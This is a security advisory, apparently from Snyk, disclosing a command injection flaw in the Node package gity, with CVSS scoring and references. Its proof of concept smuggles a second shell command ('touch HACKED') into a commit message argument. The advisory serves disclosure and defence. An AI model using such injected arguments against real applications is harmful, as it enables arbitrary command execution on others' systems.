Remote Code Execution (RCE)

Affecting gity package, ALL versions


Overview

gity is a Git wrapper for Node.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). User-supplied input is interpolated into a shell command string that is then executed without any validation or escaping, so shell metacharacters in the input (for example `;`) terminate the intended git command and run arbitrary commands. Note that the CVSS vector below rates the attack vector as Local: the attacker needs to control an argument that the application passes to the wrapper.

PoC by mik317

  • Create the following PoC file:

```javascript
// poc.js
var Git = require('gity');

var git = Git()
  .add('*.js')
  .commit('-m "added js files";touch HACKED;#')
  .run();
```

  • Check there aren't files called `HACKED`
  • Execute the following commands in another terminal:

```shell
npm i gity    # Install affected module
node poc.js   # Run the PoC
```

  • Recheck the files: now `HACKED` has been created
## Remediation
There is no fixed version for `gity`.
## References
- [HackerOne Report](https://hackerone.com/reports/730111)
- [Vulnerable Code](https://hackerone.com/redirect?signature=83666e53042da3c66e97c9afe213f17e5c0d75b0&url=https%3A%2F%2Fgithub.com%2Fstevenmiller888%2Fgity%2Fblob%2Fmaster%2Flib%2Findex.js%23L85)

CVSS Score

6.4
medium severity
  • Attack Vector
    Local
  • Attack Complexity
    High
  • Privileges Required
    High
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    High
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H
Credit
mik317
CWE
CWE-94
Snyk ID
SNYK-JS-GITY-1012730
Disclosed
24 Sep, 2020
Published
25 Sep, 2020